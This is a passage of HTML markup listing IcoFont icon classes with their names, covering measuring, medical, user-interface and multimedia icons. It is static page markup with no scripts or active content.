			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ruler-compass"></i>
				</div> 
				<span> ruler-compass </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ruler-pencil-alt-1"></i>
				</div> 
				<span> ruler-pencil-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ruler-pencil-alt-2"></i>
				</div> 
				<span> ruler-pencil-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ruler-pencil"></i>
				</div> 
				<span> ruler-pencil </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ruler"></i>
				</div> 
				<span> ruler </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rulers-alt"></i>
				</div> 
				<span> rulers-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rulers"></i>
				</div> 
				<span> rulers </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-square-root"></i>
				</div> 
				<span> square-root </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-calculator"></i>
				</div> 
				<span> ui-calculator </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-aids"></i>
				</div> 
				<span> aids </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ambulance-crescent"></i>
				</div> 
				<span> ambulance-crescent </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ambulance-cross"></i>
				</div> 
				<span> ambulance-cross </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ambulance"></i>
				</div> 
				<span> ambulance </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-autism"></i>
				</div> 
				<span> autism </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bandage"></i>
				</div> 
				<span> bandage </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-blind"></i>
				</div> 
				<span> blind </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-blood-drop"></i>
				</div> 
				<span> blood-drop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-blood-test"></i>
				</div> 
				<span> blood-test </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-blood"></i>
				</div> 
				<span> blood </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brain-alt"></i>
				</div> 
				<span> brain-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brain"></i>
				</div> 
				<span> brain </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-capsule"></i>
				</div> 
				<span> capsule </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-crutch"></i>
				</div> 
				<span> crutch </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-disabled"></i>
				</div> 
				<span> disabled </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dna-alt-1"></i>
				</div> 
				<span> dna-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dna-alt-2"></i>
				</div> 
				<span> dna-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dna"></i>
				</div> 
				<span> dna </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-doctor-alt"></i>
				</div> 
				<span> doctor-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-doctor"></i>
				</div> 
				<span> doctor </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-drug-pack"></i>
				</div> 
				<span> drug-pack </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-drug"></i>
				</div> 
				<span> drug </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-first-aid-alt"></i>
				</div> 
				<span> first-aid-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-first-aid"></i>
				</div> 
				<span> first-aid </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-heart-beat-alt"></i>
				</div> 
				<span> heart-beat-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-heart-beat"></i>
				</div> 
				<span> heart-beat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-heartbeat"></i>
				</div> 
				<span> heartbeat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-herbal"></i>
				</div> 
				<span> herbal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hospital"></i>
				</div> 
				<span> hospital </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-icu"></i>
				</div> 
				<span> icu </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-injection-syringe"></i>
				</div> 
				<span> injection-syringe </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-laboratory"></i>
				</div> 
				<span> laboratory </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-medical-sign-alt"></i>
				</div> 
				<span> medical-sign-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-medical-sign"></i>
				</div> 
				<span> medical-sign </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-nurse-alt"></i>
				</div> 
				<span> nurse-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-nurse"></i>
				</div> 
				<span> nurse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-nursing-home"></i>
				</div> 
				<span> nursing-home </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-operation-theater"></i>
				</div> 
				<span> operation-theater </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paralysis-disability"></i>
				</div> 
				<span> paralysis-disability </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-patient-bed"></i>
				</div> 
				<span> patient-bed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-patient-file"></i>
				</div> 
				<span> patient-file </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pills"></i>
				</div> 
				<span> pills </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-prescription"></i>
				</div> 
				<span> prescription </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pulse"></i>
				</div> 
				<span> pulse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stethoscope-alt"></i>
				</div> 
				<span> stethoscope-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stethoscope"></i>
				</div> 
				<span> stethoscope </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stretcher"></i>
				</div> 
				<span> stretcher </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-surgeon-alt"></i>
				</div> 
				<span> surgeon-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-surgeon"></i>
				</div> 
				<span> surgeon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tablets"></i>
				</div> 
				<span> tablets </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-test-bottle"></i>
				</div> 
				<span> test-bottle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-test-tube"></i>
				</div> 
				<span> test-tube </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thermometer-alt"></i>
				</div> 
				<span> thermometer-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thermometer"></i>
				</div> 
				<span> thermometer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tooth"></i>
				</div> 
				<span> tooth </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-xray"></i>
				</div> 
				<span> xray </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-add"></i>
				</div> 
				<span> ui-add </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-alarm"></i>
				</div> 
				<span> ui-alarm </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-battery"></i>
				</div> 
				<span> ui-battery </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-block"></i>
				</div> 
				<span> ui-block </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-bluetooth"></i>
				</div> 
				<span> ui-bluetooth </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-brightness"></i>
				</div> 
				<span> ui-brightness </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-browser"></i>
				</div> 
				<span> ui-browser </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-calendar"></i>
				</div> 
				<span> ui-calendar </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-call"></i>
				</div> 
				<span> ui-call </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-camera"></i>
				</div> 
				<span> ui-camera </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-cart"></i>
				</div> 
				<span> ui-cart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-cell-phone"></i>
				</div> 
				<span> ui-cell-phone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-chat"></i>
				</div> 
				<span> ui-chat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-check"></i>
				</div> 
				<span> ui-check </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-clip-board"></i>
				</div> 
				<span> ui-clip-board </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-clip"></i>
				</div> 
				<span> ui-clip </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-clock"></i>
				</div> 
				<span> ui-clock </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-close"></i>
				</div> 
				<span> ui-close </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-contact-list"></i>
				</div> 
				<span> ui-contact-list </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-copy"></i>
				</div> 
				<span> ui-copy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-cut"></i>
				</div> 
				<span> ui-cut </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-delete"></i>
				</div> 
				<span> ui-delete </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-dial-phone"></i>
				</div> 
				<span> ui-dial-phone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-edit"></i>
				</div> 
				<span> ui-edit </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-email"></i>
				</div> 
				<span> ui-email </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-file"></i>
				</div> 
				<span> ui-file </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-fire-wall"></i>
				</div> 
				<span> ui-fire-wall </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-flash-light"></i>
				</div> 
				<span> ui-flash-light </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-flight"></i>
				</div> 
				<span> ui-flight </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-folder"></i>
				</div> 
				<span> ui-folder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-game"></i>
				</div> 
				<span> ui-game </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-handicapped"></i>
				</div> 
				<span> ui-handicapped </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-home"></i>
				</div> 
				<span> ui-home </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-image"></i>
				</div> 
				<span> ui-image </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-laoding"></i>
				</div> 
				<span> ui-laoding </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-lock"></i>
				</div> 
				<span> ui-lock </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-love-add"></i>
				</div> 
				<span> ui-love-add </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-love-broken"></i>
				</div> 
				<span> ui-love-broken </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-love-remove"></i>
				</div> 
				<span> ui-love-remove </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-love"></i>
				</div> 
				<span> ui-love </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-map"></i>
				</div> 
				<span> ui-map </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-message"></i>
				</div> 
				<span> ui-message </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-messaging"></i>
				</div> 
				<span> ui-messaging </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-movie"></i>
				</div> 
				<span> ui-movie </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-music-player"></i>
				</div> 
				<span> ui-music-player </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-music"></i>
				</div> 
				<span> ui-music </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-mute"></i>
				</div> 
				<span> ui-mute </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-network"></i>
				</div> 
				<span> ui-network </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-next"></i>
				</div> 
				<span> ui-next </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-note"></i>
				</div> 
				<span> ui-note </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-office"></i>
				</div> 
				<span> ui-office </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-password"></i>
				</div> 
				<span> ui-password </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-pause"></i>
				</div> 
				<span> ui-pause </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-play-stop"></i>
				</div> 
				<span> ui-play-stop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-play"></i>
				</div> 
				<span> ui-play </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-pointer"></i>
				</div> 
				<span> ui-pointer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-power"></i>
				</div> 
				<span> ui-power </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-press"></i>
				</div> 
				<span> ui-press </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-previous"></i>
				</div> 
				<span> ui-previous </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-rate-add"></i>
				</div> 
				<span> ui-rate-add </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-rate-blank"></i>
				</div> 
				<span> ui-rate-blank </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-rate-remove"></i>
				</div> 
				<span> ui-rate-remove </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-rating"></i>
				</div> 
				<span> ui-rating </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-record"></i>
				</div> 
				<span> ui-record </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-remove"></i>
				</div> 
				<span> ui-remove </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-reply"></i>
				</div> 
				<span> ui-reply </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-rotation"></i>
				</div> 
				<span> ui-rotation </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-rss"></i>
				</div> 
				<span> ui-rss </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-search"></i>
				</div> 
				<span> ui-search </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-settings"></i>
				</div> 
				<span> ui-settings </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-social-link"></i>
				</div> 
				<span> ui-social-link </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-tag"></i>
				</div> 
				<span> ui-tag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-text-chat"></i>
				</div> 
				<span> ui-text-chat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-text-loading"></i>
				</div> 
				<span> ui-text-loading </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-theme"></i>
				</div> 
				<span> ui-theme </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-timer"></i>
				</div> 
				<span> ui-timer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-touch-phone"></i>
				</div> 
				<span> ui-touch-phone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-travel"></i>
				</div> 
				<span> ui-travel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-unlock"></i>
				</div> 
				<span> ui-unlock </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-user-group"></i>
				</div> 
				<span> ui-user-group </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-user"></i>
				</div> 
				<span> ui-user </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-v-card"></i>
				</div> 
				<span> ui-v-card </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-video-chat"></i>
				</div> 
				<span> ui-video-chat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-video-message"></i>
				</div> 
				<span> ui-video-message </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-video-play"></i>
				</div> 
				<span> ui-video-play </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-video"></i>
				</div> 
				<span> ui-video </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-volume"></i>
				</div> 
				<span> ui-volume </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-weather"></i>
				</div> 
				<span> ui-weather </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-wifi"></i>
				</div> 
				<span> ui-wifi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-zoom-in"></i>
				</div> 
				<span> ui-zoom-in </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-zoom-out"></i>
				</div> 
				<span> ui-zoom-out </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cassette-player"></i>
				</div> 
				<span> cassette-player </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cassette"></i>
				</div> 
				<span> cassette </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-forward"></i>
				</div> 
				<span> forward </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-guiter"></i>
				</div> 
				<span> guiter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-movie"></i>
				</div> 
				<span> movie </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-multimedia"></i>
				</div> 
				<span> multimedia </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-music-alt"></i>
				</div> 
				<span> music-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-music-disk"></i>
				</div> 
				<span> music-disk </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-music-note"></i>
				</div> 
				<span> music-note </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-music-notes"></i>
				</div> 
				<span> music-notes </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-music"></i>
				</div> 
				<span> music </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mute-volume"></i>
				</div> 
				<span> mute-volume </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pause"></i>
				</div> 
				<span> pause </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-play-alt-1"></i>
				</div> 
				<span> play-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-play-alt-2"></i>
				</div> 
				<span> play-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-play-alt-3"></i>
				</div> 
				<span> play-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-play-pause"></i>
				</div> 
				<span> play-pause </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-play"></i>
				</div> 
				<span> play </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-record"></i>
				</div> 
				<span> record </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-retro-music-disk"></i>
				</div> 
				<span> retro-music-disk </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rewind"></i>
				</div> 
				<span> rewind </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-song-notes"></i>
				</div> 
				<span> song-notes </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sound-wave-alt"></i>
				</div> 
				<span> sound-wave-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sound-wave"></i>
				</div> 
				<span> sound-wave </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stop"></i>
				</div> 
				<span> stop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-video-alt"></i>
				</div> 
				<span> video-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-video-cam"></i>
				</div> 
				<span> video-cam </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-video-clapper"></i>
				</div> 
				<span> video-clapper </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-video"></i>
				</div> 
				<span> video </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-volume-bar"></i>
				</div> 
				<span> volume-bar </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-volume-down"></i>
				</div> 
				<span> volume-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-volume-mute"></i>
				</div> 
				<span> volume-mute </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-volume-off"></i>
				</div> 
				<span> volume-off </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-volume-up"></i>
				</div> 
				<span> volume-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-youtube-play"></i>
				</div> 
				<span> youtube-play </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-2checkout-alt"></i>
				</div> 
				<span> 2checkout-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
